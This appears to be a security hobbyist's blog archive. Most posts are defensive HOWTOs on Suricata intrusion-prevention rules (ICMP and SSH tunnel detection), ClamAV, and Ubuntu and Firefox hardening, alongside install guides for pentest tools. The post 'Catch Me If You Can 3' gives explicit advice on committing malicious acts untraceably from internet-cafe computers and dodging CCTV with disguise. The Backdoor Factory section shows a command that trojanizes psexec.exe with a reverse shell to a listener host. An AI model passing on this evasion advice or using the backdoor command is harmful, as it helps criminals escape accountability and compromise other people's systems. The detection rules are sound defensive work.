Thursday, January 14, 2016

HOWTO : Network Security for Home and SOHO Users

Never think of Intrusion Prevention System (IPS) can be deployed at home or SOHO environment because of expensive cost? I have a good news for you that you can deploy IPS at home or SOHO with a very low price.

Croissants is an Intrusion Detection and Prevention System (IDPS) which is developed by me (Samiux). Its engine is next generation IDPS - Suricata. It is a very high performance engine.

Features of Croissants :

- Plug, Play and Forget!
- Suricata as IDPS Engine which is the Next Generation IDPS
- Based on ET Open rules (can use ET Pro rules with minimal settings)
- Work with ClamAV (Open Source Anti-Virus) MD5 signatures
- Work with LMD (Linux Malware Detect) MD5 signatures
- Work with IP Reputation blacklists
- Work with SSL Certificate blacklist
- Work with Denyhost SSH blacklist
- Work with Advertising Domains blacklist
- Drop certain traffic with minimal settings
- Disable and Enable rules with minimal settings
- Auto update ET Open rules, MD5 signatures and Blacklists
- Data analysis with charts on web interface
- 4K video streaming playback capable
- Can play common online games (but not ideal for playing demanding First Person Shooting games as it may has spikes) Demo videos

Zotac CI323 Nano Plus with Windows 10 equipped with 2 wired network interfaces and 1 wireless interface as well as 4GB RAM and onboard 32GB M.2 SSD.

Zotac CI323 Nano Plus is ideal to install Croissants when you insert extra 4GB RAM or replaced it with two 8GB RAM (total 16GB). I recommend to install 16GB RAM on it for better performance. Meanwhile, you need a wireless router. Croissants (special version for CI323) can be installed on the 32GB M.2 SSD with Ubuntu 14.04 LTS Server previously installed. However, it is better to install to hard drive or SSD drive.

You can get the special version at the following (the current version is 1.0-RELEASE). Please also note that the performance of 16GB version is higher than 8GB version :

8GB RAM Zotac CI323 - http://www.infosec-ninjas.com/files/croissants-1.0/croissants-home-ci323-1.0-RELEASE.tar.gz
sha256sum - a12f78ae571fa93dce0ee68f383c8b5af39a903ccaac09336dcaf0b9c5fd6278 croissants-home-ci323-1.0-RELEASE.tar.gz

16GB RAM Zotac CI323 - http://www.infosec-ninjas.com/files/croissants-1.0/croissants-smb-ci323-1.0-RELEASE.tar.gz
sha256sum - 759616b21235353953ab363f6ca8f6ecbe05e48a7988b0c771675596045959ba croissants-smb-ci323-1.0-RELEASE.tar.gz

Please refer to the Croissants website for the installation procedure. The procedure is similar to standard version of Croissants. Meanwhile, this special version will only keep 60 days data.

Make sure you connect Zotac CI323 between ISP and wireless rotuer and the monitoring cable should be connected to the router or switch (if any).

Before installing Croissants, you need to edit nsm.conf :

WIFI_SSID - The SSID of your wireless router
WIFI_PASSWORD - The password of your wireless router

The default monitoring IP will be x.x.x.180, such as 192.168.1.180.





To extend the security of your network, you may consider to add the following OpenDNS servers to your router.

OpenDNS FamilyShield DNS servers have build-in fraud and phishing protection as well as pre-configured to block adult content :
208.67.222.123
208.67.220.123

OpenDNS Home DNS servers have the captioned features but it can customized what content to be filtered. You can register to OpenDNS Home for the customization or just use the following servers without customization. They all use the following addresses :
208.67.222.222
208.67.220.220

OpenDNS DNS servers are compatible to Croissants.


REFERENCE

5 DNS Services to Block Porn Sites without Installing Software
HOWTO : Hardening and Tuning Ubuntu 14.04 LTS

That's all! See you.


Monday, December 07, 2015

Facebook Don't Care About Their Users Again

Several years ago, a researcher found a vulnerability in Facebook and he informed the official and provided with the PoC in full details when asked. Later, the researcher was told that it was not vulnerable. The researcher then exploited the founder of Facebook account with the vulnerability that he found in order to alert the founder. However, the researcher could not get his bug bounty at the end and the vulnerability was fixed by Facebook then. Some Facebook users knowing that, they then funding the researcher themselves as they thought that the researcher need the reward.

Today, another researcher, teh3ck (Twitter @teh_h3ck) found a open-redirect vulnerability and Facebook has been informed. However, tech3ck was informed that "the security impact of this bug is not significant" and refused to pay the bug bounty. The following is the timeline of the bug report :

12th of Nov 2015 | Initial bug report
12th of Nov 2015 | Reply from FB bot that it is false positive
12th of Nov 2015 | Added more clarification for the bug
16th of Nov 2015 | Reply from facebook that they use a blacklist method on their next_uri
16th of Nov 2015 | Sent POC videos of the bug that show the impact of the vulnerability
18th of Nov 2015 | Reply from facebook that i am redirecting to a non blacklisted site
18th of Nov 2015 | Explaining why url blacklisting is not the solution for the specific bug
26th of Nov 2015 | Reply from fb that security impact of this bug is not significant.
6th of Dec 2015 | Public post of the bug

For details, please refer to Vag Mour site.

In conclusion, Facebook and her security team are suck again.

That's all! See you.

Update :

After teh3ck and this article posting several hours, Facebook fixed the vulnerability without giving teh3ck any bug bounty. My recommendation is not to report to Facebook if you find something else on it. You will never never never get the bug bounty for sure.


Tuesday, November 10, 2015

HOWTO : Quick Audit Your Android Devices

*** Google Play install is no longer supported by Google. The official site provides apk file download for installation. Make sure you enabled the "Unknown sources" at "Settings" -- "Security" before the install. ***

Recently, there are some famous vulnerabilities on Android devices from Android 4.x to 5.x as well as 6.x. Since not all the vendors of Android device will release the fixes, you can inspect your devices to see if they are vulnerable or not. If they are vulnerable, you can use it with care or change to other devices which have been fixed the vulnerabilities.

VTS for Android is an open source project which can scan for the following current vulnerabilities :

ZipBug9950697
Zip Bug 8219321 / Master keys
Zip Bug 9695860
Jar Bug 13678484 / Android FakeID
CVE 2013-6282 / put/get_user
CVE_2011_1149 / PSNueter / Ashmem Exploit
CVE_2014_3153 / Futex bug / Towelroot
CVE 2014-3847 / WeakSauce
StumpRoot
Stagefright bugs
x509 Serialization bug
PingPong root - CVE-2015-3636
Stagefright - CVE-2015-6602
Samsung Remote Code Execution as System
CVE-2015-6608
CVE-2015-7414
CVE-2015-1528
CVE-2015-6616

By the way, we should also beware of the adware too. Some adware can auto-root your Android devices and they are almost impossible to remove. For details, please refer to this article.

That's all! See you.


HOWTO : Audit Your Home Router

Recently, a lot of home routers have been compromised. However, vendors of home router will not disclose if the vulnerabilities have been fixed or not. If you are Android users and using wifi at home, you can audit your home router easily with RouterCheck which can be downloaded at Google Play.

This apps will check the router if the default username and password are in force or not. It will also check if your router has the known vulnerabilities or not.

It will not change any setting of your router but it has some information for you to improve the security of your router.

That's all! See you.


Monday, October 26, 2015

HOWTO : Detect and Prevent ICMP Tunnel Attack on Suricata

Recently, I read an article about ICMP Tunnel attack. It demo how to upload a file by encoding the content with Base64 via ICMP protocol.

There is a suricata rule for detecting large ICMP packet but it is disabled by default (dated Oct 26, 2015) currently, which is :

#alert icmp any any -> any any (msg:"GPL ICMP Large ICMP Packet"; dsize:>800; reference:arachnids,246; classtype:bad-unknown; sid:1000029; rev:5;)

We can enable it by removing the "#" in front of the rule and change it to "drop".

However, it cannot detect the packet that is encoded with Base64. I draft the following Suricata rule and make it to "drop" base on the previous rule :

drop icmp any any -> any any (msg:"LOCAL ICMP Large ICMP Packet (Base64)"; dsize:>800; content:"="; pcre:"/^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$/"; reference:url,www.notsosecure.com/2015/10/15/icmp-tunnels-a-case-study/; classtype:bad-unknown; sid:1000028; rev:1;)

That's all! See you.


Thursday, October 22, 2015

HOWTO : Self-signed Certificate on Suricata

Problem

The most common weakness of Intrusion Detection and Prevention System is encrypted traffic inspection. The encrypted SSL/TLS traffic requires signed certificate for decryption. Some malicious activities may use self-signed certificate for the SSL/TLS connection.

Solution

How we can do that? If you are running Suricata as IPS, you can do it very easy with the reference of this blog. The rule will detect self-signed certificate without concerning of port number.

Make sure you have configure the Suricata properly according to the blog.

You can also use this rule for other purpose too.

Quick Reference

self-signed-cert.lua

The suricata rule is :

alert tls any any -> any any (msg:"SURICATA TLS Self Signed Certificate"; flow:established; luajit:self-signed-cert.lua; tls.store; classtype:protocol-command-decode; sid:999666111; rev:1;)

HOWTO : LuaJIT on Suricata

That's all! See you.


Thursday, October 15, 2015

HOWTO : Detect and Prevent SSH Tunnel On Suricata

Problem

The most common weakness of Intrusion Detection and Prevention System is encrypted traffic inspection. The SSH encrypted traffic requires private/public keys for encryption/decryption and it is very hard to obtain the private key from attackers.

Solution

How we can do that? If you are running Suricata as IPS, SSH Dynamic, Reverse and Port Forwarding tunnel will be detected by the following rules :

# ssh (port 5228=Google Talk, port 6697=IRC)
alert tcp any any -> any 22 (msg:"LOCAL SSH connect"; flow:established,to_server; app-layer-protocol:ssh; sid:1000008; rev:1;)

drop tcp any any -> any 22 (msg:"LOCAL not SSH but Port 22"; flow:established,to_server; app-layer-protocol:!ssh; sid:1000009; rev:1;)

drop tcp any any -> any ![22,5228,6697] (msg:"LOCAL SSH but not Port 22"; flow:established,to_server; app-layer-protocol:ssh; sid:1000010; rev:1;)


The first rule will alert you that there is a SSH connection to the port 22. The second rule will block the traffic the not SSH protocol but connect to port 22. The last rule will block the SSH connection that are not connecting to port 22, 5228 or 6697, where port 5228 is Google Talk and port 6697 is IRC.

If you do not use standard port 22 for SSH, please change the value when necessary.

Reference

SSH Brute Force and Suricata
Protocol Anomalies Detection

That's all! See you.


Wednesday, October 14, 2015

HOWTO : LuaJIT on Suricata

What is LuaJIT?

LuaJIT is a Just-In-Time Compiler (JIT) for the Lua programming language. Lua is a powerful, dynamic and light-weight programming language. It may be embedded or used as a general-purpose, stand-alone language.

LuaJIT can be used as scripting lauguage for Suricata detection rules. Emerging Threats creates some lua scripts for Suricata at here.

Lua is not enabled by default on Suricata. You need to re-compile it to make it works.

If you compile Suricata from GitHub, you can :

Compile and Install of LuaJIT :

The current version at the writing is 2.0.4.

cd ~
git clone http://luajit.org/git/luajit-2.0.git
cd luajit-2.0
make
sudo make install


Compile and Install of Suricata on Ubuntu 14.04.3 LTS :

cd ~
git clone git://phalanx.openinfosecfoundation.org/oisf.git
cd oisf
git clone https://github.com/ironbee/libhtp.git

./autogen.sh
./configure --prefix=/usr/ --sysconfdir=/etc/ --localstatedir=/var/ --enable-luajit \
--enable-geoip --with-libnss-libraries=/usr/lib --with-libnss-includes=/usr/include/nss/ \
--with-libnspr-libraries=/usr/lib --with-libnspr-includes=/usr/include/nspr \
--with-libcap_ng-libraries=/usr/local/lib --with-libcap_ng-includes=/usr/local/include \
--with-libluajit-includes=/usr/local/include/luajit-2.0/ \
--with-libluajit-libraries=/usr/local/lib/


make clean
make
sudo make install
sudo ldconfig


Works with ET Lua scripts :

# install lua related packages
sudo apt-get -y install cmake lua-zip lua-zip-dev lua-zlib lua-zlib-dev \
luarocks libzzip-dev libzzip-0.13 lua-apr lua-apr-dev lua-socket \
lua-socket-dev lua-sec lua-sec-dev lua-rex-gnu lua-rex-gnu-dev \
lua-rex-pcre lua-rex-pcre-dev lua-bitop lua-bitop-dev liblua5.1 \
libzip-dev

sudo apt-get -y install cmake build-essential

sudo luarocks install struct
sudo luarocks install bitlib

sudo cp /usr/lib/x86_64-linux-gnu/liblua5.1.so /usr/local/lib/liblua.so


# compile and install ltn12ce
cd ~
git clone https://github.com/mkottman/ltn12ce.git
cd ltn12ce
mkdir build && cd build
cmake ..
make
sudo make install
sudo mkdir -p /usr/local/lib/lua/5.1/ltn12ce
sudo cp ~/ltn12ce/build/src/ltn12ce/core.so /usr/local/lib/lua/5.1/ltn12ce


# compile and install zlib
cd ~
wget http://zlib.net/zlib-1.2.8.tar.gz
tar -xzvf zlib-1.2.8.tar.gz
cd zlib-1.2.8
./configure
make
sudo make install


# compile and install lua-zlib
cd ~
git clone https://github.com/brimworks/lua-zlib.git
cd lua-zlib
make linux
sudo mkdir -p /usr/lib/lua/5.1
sudo mkdir -p /usr/local/lib/lua/5.1
sudo cp zlib.so /usr/local/lib/lua/5.1
sudo make install

sudo cp /usr/lib/x86_64-linux-gnu/lua/5.1/zip.so /usr/local/lib/lua/5.1
sudo mkdir -p /usr/local/lib/lua/5.1/apr
sudo cp /usr/lib/x86_64-linux-gnu/lua/5.1/apr/core.so /usr/local/lib/lua/5.1/apr



Make sure the ET lua scripts and related rules are placed at "/etc/suricata/rules" and the "luajit-drop.rules" or "luajit.rules" is loaded in suricata.yaml.

Bug Fix on ET Lua scripts :

Please note that CVE-2015-1770.lua and CVE-2015-2375.lua have a small bug when using with luajit. You can fix them like this :

sudo sed -i -e 's/activeX%d+\\.xml/activeX%d+.xml/g' /etc/suricata/rules/CVE-2015-1770.lua
sudo sed -i -e 's/table%d+\\.xml/table%d+.xml/g' /etc/suricata/rules/CVE-2015-2375.lua


Finally, if you are using Snorby, you need to copy the all rules files (except lua scripts) to another place, such as "/etc/suricata/rules/snorby" for Snorby; otherwise, Snorby cannot display the rules when requested. Meanwhile, you need to edit "/var/www/snorby/config/snorby_config.yml" for the new rules path.

One more thing, the value of "prealloc" at "flow" section at suricata.yaml should not more than "4000000"; otherwise, the lua scripts cannot be loaded.

After that, restart Suricata.

That's all! See you.


Friday, October 09, 2015

HOWTO : ClamAV For Suricata

Suricata is an Intrusion Detection and Prevention System and it can work with ClamAV too. One of the features of Suricata is using MD5 hash with the file. We can use ClamAV signature MD5 hash for every file download inspection. We can also save the malicious file for further analysis.

Install and Configure of ClamAV

sudo apt-get update
sudo apt-get install clamav
sudo update-rc.d clamav-freshclam disable


We will not use ClamAV engine for Suricata but use ClamAV MD5 signature instead.

Prepare ClamAV MD5 Signature for Suricata

sudo nano /usr/bin/nsm_clamav_md5



sudo chmod +x /usr/bin/nsm_clamav_md5

Create cron job :

sudo crontab -e

0 03 * * * /usr/bin/nsm_clamav_md5


* The cron job will run the script (nsm_clamav_md5) at 0300 hours every day and it should be earlier than the Suricata rules update script/procedure.

Create your Suricata Local Rule

sudo nano /etc/suricata/rules/local.rules

Append the following to the file :

# rules for file extraction
# this rule drop all the file that matches the clamav md5 hash
drop http any any -> any any (msg:"LOCAL Malicious file - Clamav MD5 Hash"; flow:established; filestore; filemd5:blacklist_md5; classtype: suspicious-filename-detect; sid:1000000; rev:1;)


Configure suricata.yaml

sudo nano /etc/suricata/suricata.yaml

Make the following settings as the following :



* If you do not like to save the malicious file for further analysis, you can disable the "file-store" setting at suricata.yaml and remove the "filestore" keyword from the local.rules.

Make It To Work Together

sudo nsm_clamav_md5

Restart suricata or reboot the box. For Croissants, you can restart the Suricata by issuing the following command :

sudo restart suricata

The Suricata will block the malicious files from downloading when the MD5 hash is matched and the malicious files will be saved at /var/log/suricata/files for further inspection.

Known Issue

libhtp 0.5.x cannot handle the file download re-try with browser at the moment. It is recommended that all users should not re-try to download any file when it cannot be downloaded in the beginning. According to the developer of libhtp, 0.6.x can handle this problem.

Another limitation is that Suricata can detected the malicious files (MD5 hash) that known to ClamAV only.

Reference

Filemd5 and white or black listing with MD5 hashes

That's all! See you.


Sunday, October 04, 2015

Cloudflare Or Not Cloudflare?

Cloudflare is very famous in against DDoS attacks. Their by-product is the IP address of the protected sites are hidden if the owner of the protected sites are setting it correctly. However, it is not very easy to set it correctly when the owners do not fully understand well the services that Cloudflare is provided.

Many website owners choose to use Cloudflare services including criminals. There are a lot of methods to resolve the IP address of the websites that behind Cloudflare protection, such as CrimeFlare. Almost all these methods are targeted to the mis-configuration of Cloudflare. Some of the methods do not work as Cloudflare has been fixed the problem long time ago.

Recently, there is a new method to resolve the IP address of the websites that behind Cloudflare, that is Cloudflare IP resolver. However, if the webmaster or sysadmin is clever enough, this method is also failed.

No matter how, this new method is also a killer to Cloudflare for sure.

Finally, when you think that your system is very very secure, your system will be very danger.

That's all! See you.


Thursday, September 17, 2015

Will Linux Be Infected By Malware Or Not?

When I came to know Linux, almost all advanced Linux users told me that Linux is impossible to be infected by virus and malware due to its excellent design. Except root or sudoer, nobody has the privilege to do harm on the system including malware. In case your Linux is infected, only you (the user) is affected. Therefore, you are not required to install any anti-virus or anti-malware application on Linux system. Meanwhile, Linux will not infected Windows based malware. Moreover, Linux developers tried to harden the Linux kernel in many ways, such as ASLR, XD/NX, SELinux, Apparmor, and Gentoo's harden-kernel, etc.

After being an Information Security Enthusiast, I recognized that it is totally not true. In my opinion, Linux just like any other operating systems that can be infected by malware and the interference is not limited to your system only. There are many such news recently.

Linux users can be infected with malware in many ways and some malware are cross-platform software too. The most common way to be infected malware is by surfing internet with your browsers. The other most common way is not keeping your Linux system up-to-date. For example, the very famous Heartbleed vulnerability is still vulnerable for over 200,000 devices in the world after more than a year.

Once you are infected, the malware can perform privilege escalation on your Linux system to gain the rights of root. How this to be done? The most common one is vulnerability of the kernel and/or application software. The other is by social engineering. The most insecure part is human being anyway.

Furthermore, most modern Linux distributions implied sudoer. Sudoer has the rights of root. However, most sysadmins or users will set their account name and password in a very weak way. In addition, the password of root can be easily guessed in most cases for those distributions that not using sudoer. I just name some of them here and there are many ways to get root privilege on Linux systems, for example, misconfiguration of Linux system and/or application software.

Hereby, I name some software, skills and tools as well as technologies on Linux malware for your reference. Hope you all understand that Linux is not a bullet-proof system. It is very easy to break for sure. Finally, I would like to introduce how I hardening Ubuntu for my current daily use, here you are.

Open Source Anti Linux Malware

Linux Malware Detect

ClamAV

Linux Forensics and Linux Malware Analysis

REMnux: A Linux Toolkit for Reverse-Engineering and Analyzing Malware

Linux and Disk Forensics

Books for Linux Malware Analysis and Forensics

Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides

Linux Forensics

Reference

Don’t believe these four myths about Linux security

Wiki - Linux malware

Wiki - Address Space Layout Randomization (ASLR)

Wiki - Social Engineering


That's all! See you.


HOWTO : ArpON on Ubuntu 14.04 LTS

ArpON (ARP handler inspection) is a portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. It blocks also the derived attacks by it, which Sniffing, Hijacking, Injection, Filtering & co attacks for more complex derived attacks, as: DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

Step 1 :

sudo apt-get update
sudo apt-get install arpon


Step 2 :

sudo nano /etc/default/arpon

Uncomment the DARPI and RUN, makes it looking as :

DAEMON_OPTS="-q -f /var/log/arpon/arpon.log -g -d"
RUN="yes"

Step 3 :

sudo /etc/init.d/arpon restart

That's all! See you.


Wednesday, September 16, 2015

HOWTO : Hardening and Tuning Ubuntu 14.04 LTS

This guide will lead you to hardening and tuning your Ubuntu 14.04 in a few steps without any expense. As an Information Security Enthusiast, my Ubuntu box is setting up like the following and I use the box every day.

kernel Hardening and Tuning

Make sure you enabled the "No Execute (NX)" or "Execute Disable (XD)" in the BIOS/UEFI.

sudo nano sysctl.conf

To make it looks like the following :



To reload it :

sudo sysctl -p

ARP Spoofing

One of the common attacks is Man In The Middle attack. It can use with browser attack too. This guide will help to protect your Ubuntu from being spoofing. Meanwhile, make sure to set ARP related settings in your router if the feature is available. Most home routers have no such feature.

HOWTO : ArpON on Ubuntu 14.04 LTS

Anti-Malware

Most Linux users (including advanced users) misunderstand that Linux will never and impossible to infect with malware. However, it is not ture. Almost all operating systems are similar to the threats.

HOWTO : ClamAV on Ubuntu 14.04 LTS

This guide will lead you to set up ClamAV for "Scan On Access" instead of "Scan On Demand".

Network Interface Tuning

sudo nano /etc/rc.local

Insert the following before "exit 0" :

/sbin/ifconfig eth0 txqueuelen 10000
/sbin/ifconfig wlan0 txqueuelen 10000


* make sure your NICs are "eth0" and "wlan0" or else

Storage Performance Tuning

(A) SSD

Verify TRIM is supported :

sudo hdparm -I /dev/sda | grep TRIM

If the output is similar to the below which is supported :

* Data Set Management TRIM supported (limit 1 block)

If you install your Ubuntu in LVM, the TRIM is usually enabled by default. You can confirm it :

cat /etc/lvm/lvm.conf | grep issue_discards

If the output is similar to the below which is enabled :

issue_discards = 1

Then set the following to "deadline" if it is not done yet.

cat /sys/block/sda/queue/scheduler

noop [deadline] cfq

If not, set it :

sudo nano /etc/rc.local

Insert the following before "exit 0" :

echo 1024 > /sys/block/sda/queue/read_ahead_kb
echo 1024 > /sys/block/sda/queue/nr_requests
echo deadline > /sys/block/sda/queue/scheduler


* make sure your device is sda (or sdb ...)

To reload it or reboot your system :

sudo /etc/rc.local

After that, you need to edit the partition table :

To make it looks like the following :

/dev/mapper/ubuntu--vg-root / ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


If you have an error after running the captioned commands, DO NOT reboot your system. You should correct the typo before doing so; otherwise, you cannot boot to your system again.

Hard Drive

sudo nano /etc/rc.local

Insert the following before "exit 0" :

echo 1024 > /sys/block/sda/queue/read_ahead_kb
echo 1024 > /sys/block/sda/queue/nr_requests


* make sure your device is sda (or sdb ...)

To reload it or reboot your system :

sudo /etc/rc.local

After that, you need to edit the partition table :

To make it looks like the following :

ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


If you have an error after running the captioned commands, DO NOT reboot your system. You should correct the typo before doing so; otherwise, you cannot boot to your system again.

Firefox Hardening and Tuning

Most malicious attacks nowadays are via browsers. Therefore, we need to protect ourselves even we are using Linux.

(A) Apparmor For Firefox

AppArmor is a Linux Security Module implementation of name-based access controls.

sudo apt-get update
sudo apt-get install apparmor-utils apparmor-profiles


To make it looks like the following :



sudo rm /etc/apparmor.d/disable/usr.bin.firefox

Reload the rules :

sudo apparmor_parser -r /etc/apparmor.d/usr.bin.firefox

(B) Firefox Add-ons

NoScript

Allow active content to run only from sites you trust, and protect yourself against XSS and Clickjacking attacks.

* You are not required to enable it as it will block the javascript that most modern websites are using. You need to disable it globally to make the XSS attack protection by default.

uBlock Origin

Finally, an efficient blocker. Easy on CPU and memory. (Please refer to the official site for details)

Cyscon Security Shield

Enjoy enhanced protection from phishing threats and malicious sites while browsing the Internet.

WebRTC Control

Have control over WebRTC (disable or enable) and protect your IP address.

BetterPrivacy

Remove or manage a new and uncommon kind of cookies, better known as LSO's.The BetterPrivacy safeguard offers various ways to handle Flash-cookies set by Google, YouTube, Ebay and others...

HTTPS Everywhere

Encrypt the web! HTTPS Everywhere is a Firefox extension to protect your communications by enabling HTTPS encryption automatically on sites that are known to support it, even when you type URLs or follow links that omit the https: prefix.

Speed Tweaks (SpeedyFox)

This extension provides a list to almost all the settings that you may need to alter in order to enhance Firefox's speed.

ZenMate Security and Privacy VPN

ZenMate secures your browsing with encryption - protecting you from hackers, snoopers and data thieves who prey on unsecure connections.

(C) Optional

(1) Firefox Add-ons :

User-Agent Switcher

The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser.

Youtube High Definition

YouTube High Definition is a powerful tool that will let you automatically play all YouTube videos in HD (High Definition), turn off annotations, change video player size, auto stop videos, auto mute videos, control embedded videos and much more.

Youtube Flash-Html5

Play YouTube Videos in Flash or HTML5 Player.

(2) Browse with "New Private Window" feature

Finally, you may consider to use Intrusion Detection and Prevention System (IDPS) to protect your network. My project "Croissants" which is an IDPS that can deploy to your network (in front or/and behind the router). Or, you may also consider to use TOR to protect your privacy with my project "NightHawk".

Reference

WebRTC IPS

IP Leak

That's all! See you.


Tuesday, September 08, 2015

HOWTO : ClamAV on Ubuntu 14.04 LTS

Clam AntiVirus (ClamAV) is a free and open-source, cross-platform antivirus software tool-kit able to detect many types of malicious software, including viruses.

This guide will lead you to set up ClamAV for "Scan On Access" instead of "Scan On Demand". It is also target to Desktop usage only.

The current version at this writing is ClamAV 0.98.7+dfsg.

Step 1 :

sudo apt-get install clamav clamav-freshclam clamav-daemon libclamunrar6

Step 2 :

sudo nano /etc/clamav/clamd.conf

To make the entries looking like the following. Make sure to replace "samiux" with your username.



cd ~
mkdir quarantine


Step 3 :

sudo nano /etc/clamav/freshclam.conf

To make the entries looking like the following.



sudo freshclam

Step 4 :

sudo nano /etc/apparmor.d/usr.sbin.clamd

To make the entries looking like the following.



After that, execute the following command to reload the apparmor rules.

sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.clamd

Remark :

Download or copy will not trigger the ClamAV scan but browsing or executing (or etc) will. If any malware or virus (no matter it is for Windows, Linux or Mac OSX) is detected, it will be moved to "quarantine" directory. You can also check the log at "/var/log/clamav/clamav.log".

Testing :

You can install NO harm virus testing files for testing.

sudo apt-get install clamav-testfiles

The NO harm virus testing files are located at "/usr/share/clamav-testfiles".

Reference

AppArmor Wiki

See also : Fireclam Firefox Add-ons

That's all! See you.


Saturday, August 29, 2015

HOWTO : Commix on Ubuntu 14.04 LTS

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/stasinopoulos/commix.git
cd commix
python commix.py -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/commix
python commix.py --update



Reference

Wiki


That's all! See you.


HOWTO : HconSTF on Ubuntu 14.04

Hcon Security Testing Framework (HconSTF) is Web Application Security Analysis & Penetration Testing Framework made of mozilla technologies.

Most of the part of HconSTF is semi-automated but you still need your brain to work it out. It can be use in all kind of security testing stages, it has tools for conducting tasks like,

- Web Penetration Testing
- Web Exploits Development
- Web Malware Analysis
- Open Source Intelligence ( Cyber Spying & Doxing )


Install

cd ~
mkdir arsenal
cd arsenal


For x86_64 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Prime_Linux_x64.tar.bz2
tar -jxvf HconSTF_v0.5_Prime_Linux_x64.tar.bz2
cd HconSTF
sudo ./HconSTF


For x86 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Linux_x86.tar.bz2
tar -jxvf HconSTF_v0.5_Linux_x86.tar.bz2
cd HconSTF
sudo ./HconSTF



Update/Upgrade

rm -R ~/arsenal/HconSTF

Go to the official site to download the latest version and repeat the Install procedure.


Reference

User Manual (PDF)


That's all! See you.


HOWTO : PTF on Ubuntu 14.04 LTS

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.


Install


sudo apt-get install git

cd ~
git clone https://github.com/trustedsec/ptf.git
cd ptf
sudo ./ptf


If you want to install and/or update everything :

use modules/install_update_all
run



All the modules (pentesting tools) are installed at /pentest directory. Please note that WINE and i386 dependencies will be installed accordingly.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

PTF will try to update itself on every start up. Meanwhile, you can run PTF at any directory after the first run.

If you want to update everything :

sudo ptf
use modules/install_update_all
run



Reference

Video

Documentation


That's all! See you.


Friday, August 28, 2015

Catch Me If You Can 3

Last year, I was talking about how to use NightHawk to do malicious things. The full article is here. Two years ago, I also talked about using pre-paid SIM card to do malicious things and the full article is here. However, you think that it would be a chance to be caught as TOR network exit nodes may be monitoring by law enforcements. Meanwhile, identity registration may be needed to purchase SIM card in your country. Okay, today I will introudce another method that you can use wired network to do malicious things untraceable.

In my country, there are many "Internet Cafe" which have a pool of computer systems that running Windows system to provide network gaming or internet services to their customers with a cheap price per hour. Those computer systems will be equipped "Reborn Card" which can reset to its default setting on every reboot. Normally, the "Internet Cafe" will reboot their computer systems every day.

You can hire a computer system in the "Internet Cafe", reboot it. Plug in your Kali Linux or BackBox Linux Live USB (or your custom made pentesting Linux Live USB). Personally, I will recommend BackBox as it will have some outstanding features, such as memory wiper.

After your malicious tasks, you can reboot your computer system and it will reset to its default setting. Normally, no data or activiities will be logged in the computer system.

When law enforcements trace your IP address which will direct them to the "Internet Cafe", they cannot obtain any evidence from the computer pool as those systems are reborned!

Finally, beware that CCTV will be installed in the "Internet Cafe" or nearby shops which will capture your present. You may need to do some "make up" when necessary.

That's all! See you.


HOWTO : OpenVAS on Ubuntu 14.04 LTS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.


Install

To install OpenVAS 8 on Ubuntu 14.04 LTS :

sudo add-apt-repository ppa:mrazavi/openvas

sudo apt-get update
sudo apt-get install xsltproc sqlite3 openvas

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress


To run it :

Open browser to point to https://localhost:443

* username and password are both "admin"


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress



Reference

You can disable OpenVAS auto startup on every boot and start it manually. Please note that if OpenVAS is running, shutdown process will take time.

For example :

sudo update-rc.d openvas-scanner disable
sudo update-rc.d openvas-manager disable


To start up manually :

sudo service openvas-scanner start
sudo service openvas-manager start


To stop manually :

sudo service openvas-scanner stop
sudo service openvas-manager stop



That's all! See you.


HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS

The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.


Install

sudo apt-get install git python-pip build-essential

Install BDFactory :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh


How to run it :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

Install BDFProxy :

cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh


